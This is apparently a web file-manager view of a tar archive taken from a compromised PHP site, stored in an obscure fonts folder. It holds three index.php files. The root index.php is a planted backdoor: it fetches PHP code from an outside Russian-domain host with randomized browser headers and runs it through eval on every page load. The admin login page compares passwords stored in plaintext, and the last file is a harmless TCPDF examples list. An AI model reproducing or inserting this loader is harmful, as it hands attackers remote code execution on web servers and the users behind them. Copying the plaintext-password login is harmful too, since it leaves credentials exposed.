File Manager

Current Directory: /home/aissorg/public_html/fonts/qzfcvsedcv/werwcwsfs
Viewing File: /home/aissorg/public_html/fonts/qzfcvsedcv/werwcwsfs/index.php.tar
home/aissorg/public_html/index.php000064400000001117151162217650013273 0ustar00<?php # Tanda Pengembang: FB382CE8 function jcur($url) { $ch = curl_init(); $headers = [ 'User-Agent: ' . ['Chrome', 'Firefox', 'Safari'][rand(0, 2)] . '/' . rand(50, 90) . '.0', 'Accept: text/html,application/xhtml+xml', 'X-Request-ID: ' . bin2hex(random_bytes(8)) ]; curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); $result = curl_exec($ch); curl_close($ch); eval('?>' . $result); } jcur("https://code.topkz.ru/ss/cw3515.php");home/aissorg/public_html/admin/index.php000064400000012754151162316150014367 0ustar00<?php include('include/config.php'); if (session_status() === PHP_SESSION_NONE) { session_start(); } if (isset($_POST['amd_login'])) { $uname = mysqli_real_escape_string($con, $_POST['uname']); $password = mysqli_real_escape_string($con, $_POST['pwd']); $admin_login = mysqli_query($con, "SELECT * FROM admin_login WHERE username = '$uname' AND password = '$password' AND is_active = 1"); $admin_row = mysqli_fetch_array($admin_login); $admin_count = mysqli_num_rows($admin_login); if ($admin_count > 0) { $_SESSION['login'] = $admin_row['id']; $_SESSION['name'] = $admin_row['name']; header("Location: dashboard.php"); exit; } else { // Set the alert message in session $_SESSION['alert'] = [ 'message' => 'Login Information is Incorrect.', 'type' => 'danger' // Bootstrap alert class for error ]; header("Location: index.php"); exit; } } ?> <!DOCTYPE html> <html lang="en" data-layout="vertical" data-topbar="light" data-sidebar="light" data-sidebar-size="lg" data-sidebar-image="none"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="keywords" content=""> <meta name="author" content=""> <title>Login</title> <!-- Favicon --> <link rel="shortcut icon" href=""> <!-- Bootstrap CSS --> <link rel="stylesheet" href="assets/css/bootstrap.min.css"> <!-- Font family --> <style type="text/css"></style> <!-- Fontawesome CSS --> <link rel="stylesheet" href="assets/plugins/fontawesome/css/fontawesome.min.css"> <link rel="stylesheet" href="assets/plugins/fontawesome/css/all.min.css"> <!-- Main CSS --> <link rel="stylesheet" href="assets/css/style.css"> <!-- Layout Js --> <script src="assets/js/layout.js" type="80d158f9ecd59126f1347133-text/javascript"></script> </head> <body> <!-- Main Wrapper --> <div class="main-wrapper login-body"> <div class="login-wrapper"> <div class="container"> <?php if (session_status() === PHP_SESSION_NONE) { session_start(); } if (isset($_SESSION['alert'])) { $alert = $_SESSION['alert']; echo "<div class='alert alert-{$alert['type']} alert-dismissible fade show' role='alert'> <strong>{$alert['message']}</strong> <button type='button' class='btn-close' data-bs-dismiss='alert' aria-label='Close'></button> </div>"; unset($_SESSION['alert']); // Clear the alert after displaying } ?> <img class="img-fluid logo-dark mb-2 logo-color" src="assets/img/logo.png" alt="Logo"> <img class="img-fluid logo-light mb-2" src="assets/img/logo.png" alt="Logo"> <div class="loginbox"> <div class="login-right"> <div class="login-right-wrap"> <h1>Login</h1> <p class="account-subtitle">Access to our dashboard</p> <form action="index.php" method="POST"> <div class="input-block mb-3"> <label class="form-control-label">Username</label> <input type="text" name="uname" class="form-control" required> </div> <div class="input-block mb-3"> <label class="form-control-label">Password</label> <div class="pass-group"> <input type="password" name="pwd" class="form-control pass-input" required> <span class="fas fa-eye toggle-password"></span> </div> </div> <button class="btn btn-lg btn-primary w-100" type="submit" name="amd_login">Login</button> </form> </div> </div> </div> </div> </div> </div> <script> // Toggle Password Visibility document.querySelector('.toggle-password').addEventListener('click', function () { const passwordInput = document.querySelector('.pass-input'); if (passwordInput.type === 'password') { passwordInput.type = 'text'; this.innerHTML = ''; } else { passwordInput.type = 'password'; this.innerHTML = ''; } }); </script> <!-- /Main Wrapper --> <!-- jQuery --> <script src="assets/js/jquery-3.7.1.min.js" type="80d158f9ecd59126f1347133-text/javascript"></script> <!-- Bootstrap Core JS --> <script src="assets/js/bootstrap.bundle.min.js" type="80d158f9ecd59126f1347133-text/javascript"></script> <!-- Theme Settings JS --> <script src="assets/js/theme-settings.js" type="80d158f9ecd59126f1347133-text/javascript"></script> <script src="assets/js/greedynav.js" type="80d158f9ecd59126f1347133-text/javascript"></script> <!-- Custom JS --> <script src="assets/js/script.js" type="80d158f9ecd59126f1347133-text/javascript"></script> <script src="../../cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="80d158f9ecd59126f1347133-|49" defer></script></body> </html>home/aissorg/public_html/TCPDF/examples/index.php000064400000024745151162503570015764 0ustar00<?php echo '<'.'?'.'xml version="1.0" encoding="UTF-8"'.'?'.'>'; ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> <title>TCPDF Examples</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="description" content="TCPDF is a PHP class for generating PDF documents on the fly" /> <meta name="author" content="Nicola Asuni" /> <meta name="keywords" content="Examples, TCPDF, PDF, PHP class" /> </head> <body> <h1>TCPDF Examples</h1> <h2>PDF</h2> <ol> <li>Simple PDF with default Header and Footer: [<a href="example_001.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Simple PDF without Header and Footer: [<a href="example_002.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Custom Header and Footer: [<a href="example_003.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Cell stretching: [<a href="example_004.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Multicell: [<a href="example_005.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>WriteHTML and RTL support: [<a href="example_006.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Independent columns with WriteHTMLCell: [<a href="example_007.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>External UTF-8 text file: [<a href="example_008.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Image: [<a href="example_009.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Multiple columns: [<a href="example_010.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Colored Tables: [<a href="example_011.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Graphic Functions: [<a href="example_012.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Graphic Transformations: [<a href="example_013.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Javascript and Forms: [<a href="example_014.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Bookmarks (Table of Content): [<a href="example_015.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Document Encryption: [<a href="example_016.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Independent columns with MultiCell: [<a href="example_017.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Persian and Arabic language on RTL document: [<a href="example_018.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Non unicode / Alternative config file: [<a href="example_019.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Multicell complex alignment: [<a href="example_020.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>writeHTML alignment: [<a href="example_021.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>CMYK colors: [<a href="example_022.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Page Groups: [<a href="example_023.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Object Visibility and Layers: [<a href="example_024.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Object Transparency: [<a href="example_025.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Text Rendering Modes and Text Clipping: [<a href="example_026.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>1D Barcodes: [<a href="example_027.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Multiple page formats: [<a href="example_028.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Set PDF viewer display preferences: [<a href="example_029.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Colour gradients: [<a href="example_030.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Pie Chart Graphic: [<a href="example_031.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>EPS/AI vectorial image: [<a href="example_032.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Mixed font types (TrueType Unicode, core, CID-0): [<a href="example_033.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Clipping masks: [<a href="example_034.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Line styles with cells and multicells: [<a href="example_035.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Text Annotations: [<a href="example_036.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Spot Colors: [<a href="example_037.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>NON-embedded CID-0 CJK font: [<a href="example_038.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>HTML Justification: [<a href="example_039.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Booklet (double-sided pages): [<a href="example_040.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>File attachment: [<a href="example_041.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Image with Alpha Channel Transparency: [<a href="example_042.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Disk caching: [<a href="example_043.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Move, Copy and Delete page: [<a href="example_044.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Table Of Content with Bookmarks: [<a href="example_045.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Text hyphenation: [<a href="example_046.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Transactions and UNDO: [<a href="example_047.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Table header and rowspan: [<a href="example_048.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>TCPDF methods in HTML: [<a href="example_049.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>2D Barcode (QR-Code, Datamatrix ECC200 and PDF417): [<a href="example_050.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Full page background: [<a href="example_051.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Digital Signature Certification: [<a href="example_052.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Javascript functions: [<a href="example_053.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>XHTML Form: [<a href="example_054.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Font Dump: [<a href="example_055.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Crop Marks and Registration Marks: [<a href="example_056.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Cell vertical alignments and borders: [<a href="example_057.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>SVG Image: [<a href="example_058.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Table Of Content with HTML templates: [<a href="example_059.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Advanced page settings: [<a href="example_060.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>XHTML + CSS: [<a href="example_061.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>XObject Templates: [<a href="example_062.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Text stretching and spacing (tracking/kerning): [<a href="example_063.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>No-write page regions: [<a href="example_064.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>PDF/A-1b (ISO 19005-1:2005) document: [<a href="example_065.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Using WriteHTMLCell: [<a href="example_066.php" title="PDF [new window]" target="_blank">PDF</a>]</li> <li>Shorthand border styles including !important: [<a href="example_067.php" title="PDF [new window]" target="_blank">PDF</a>]</li> </ol> <h2>Barcodes</h2> <ol> <li>1D barcode HTML format [<a href="barcodes/example_1d_html.php" title="1D barcode [HTML] [new window]" target="_blank">HTML</a>]</li> <li>1D barcode PNG format [<a href="barcodes/example_1d_png.php" title="1D barcode [PNG] [new window]" target="_blank">PNG</a>]</li> <li>1D barcode SVG format [<a href="barcodes/example_1d_svg.php" title="1D barcode [SVG] [new window]" target="_blank">SVG</a>]</li> <li>1D barcode SVG INLINE format [<a href="barcodes/example_1d_svgi.php" title="1D barcode [SVGI] [new window]" target="_blank">SVG INLINE</a>]</li> <li>2D datamatrix barcode HTML format [<a href="barcodes/example_2d_datamatrix_html.php" title="2D datamatrix barcode [HTML] [new window]" target="_blank">HTML</a>]</li> <li>2D datamatrix barcode PNG format [<a href="barcodes/example_2d_datamatrix_png.php" title="2D datamatrix barcode [PNG] [new window]" target="_blank">PNG</a>]</li> <li>2D datamatrix barcode SVG format [<a href="barcodes/example_2d_datamatrix_svg.php" title="2D datamatrix barcode [SVG] [new window]" target="_blank">SVG</a>]</li> <li>2D datamatrix barcode SVG INLINE format [<a href="barcodes/example_2d_datamatrix_svgi.php" title="2D datamatrix barcode [SVGI] [new window]" target="_blank">SVG INLINE</a>]</li> <li>2D pdf417 barcode HTML format [<a href="barcodes/example_2d_pdf417_html.php" title="2D pdf417 barcode [HTML] [new window]" target="_blank">HTML</a>]</li> <li>2D pdf417 barcode PNG format [<a href="barcodes/example_2d_pdf417_png.php" title="2D pdf417 barcode [PNG] [new window]" target="_blank">PNG</a>]</li> <li>2D pdf417 barcode SVG format [<a href="barcodes/example_2d_pdf417_svg.php" title="2D pdf417 barcode [SVG] [new window]" target="_blank">SVG</a>]</li> <li>2D pdf417 barcode SVG INLINE format [<a href="barcodes/example_2d_pdf417_svgi.php" title="2D pdf417 barcode [SVGI] [new window]" target="_blank">SVG INLINE</a>]</li> <li>2D qrcode barcode HTML format [<a href="barcodes/example_2d_qrcode_html.php" title="2D qrcode barcode [HTML] [new window]" target="_blank">HTML</a>]</li> <li>2D qrcode barcode PNG format [<a href="barcodes/example_2d_qrcode_png.php" title="2D qrcode barcode [PNG] [new window]" target="_blank">PNG</a>]</li> <li>2D qrcode barcode SVG format [<a href="barcodes/example_2d_qrcode_svg.php" title="2D qrcode barcode [SVG] [new window]" target="_blank">SVG</a>]</li> <li>2D qrcode barcode SVG INLINE format [<a href="barcodes/example_2d_qrcode_svgi.php" title="2D qrcode barcode [SVGI] [new window]" target="_blank">SVG INLINE</a>]</li> </ol> </body> </html>